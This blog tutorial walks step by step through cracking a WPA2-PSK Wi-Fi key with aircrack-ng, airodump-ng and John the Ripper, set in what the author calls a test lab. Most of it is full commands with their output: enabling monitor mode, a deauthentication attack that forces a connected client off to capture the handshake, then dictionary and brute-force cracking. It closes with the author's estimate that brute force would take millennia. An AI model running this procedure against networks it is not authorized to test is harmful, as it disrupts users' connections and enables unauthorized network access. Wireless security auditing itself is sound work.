Basic steps :
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At
this point, you have 2 options : either wait until a client connects
and the 4-way handshake is complete, or deauthenticate an existing
client and thus force it to reassociate. Time is money, so let’s force
the deauthenticate. We need the bssid of the AP (-a) and the mac of a
connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng and make sure the files were created properly
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form
this point forward, you do not need to be anywhere near the wireless
network. All cracking will happen offline, so you can stop airodump and
other processes and even walk away from the AP. In fact, I would suggest
to walk away and find yourself a cosy place where you can live, eat,
sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it
can take a very very long time. There are 2 ways of bruteforcing : one
that is relatively fast but does not guarantee success and one that is
very slow, but guarantees that you will find the key at some point in
time
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet , or can be generated with tools such
as John The Ripper. Once the wordlist is created, all you need to do is
run aircrack-ng with the worklist and feed it the .cap fie that
contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The
success of cracking the WPA2 PSK key is directly linked to the strength
of your password file. In other words, you may get lucky and get the
key very fast, or you may not get the key at all.
The
second method (bruteforcing) will be successfull for sure, but it may
take ages to complete. Keep in mind, a WPA2 key can be up to 64
characters, so in theory you would to build every password combination
with all possible character sets and feed them into aircrack. If you
want to use John The Ripper to create all possible password combinations
and feed them into aircrack-ng, this is the command to use :
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers)
That’s it
Update
:after 20 hours of cracking, the key still has not been found. The
system I’m using to crack the keys is not very fast, but let’s look at
some facts :
8
characters, plain characters (lowercase and uppercase) or digits = each
character in the key could has 26+26+10 (62) possible combinations. So
the maximum number of combinations that need to be checked in the
bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340
105 584 896 At about 600 keys per second on my “slow” system, it
could take more than 101083382 hours to find the key (11539 year). I
have stopped the cracking process as my machine is way too slow to crack
the key while I’m still alive… So think about this when doing a WPA2
PSK Audit.
No comments:
Post a Comment
Dharamart.blogspot.in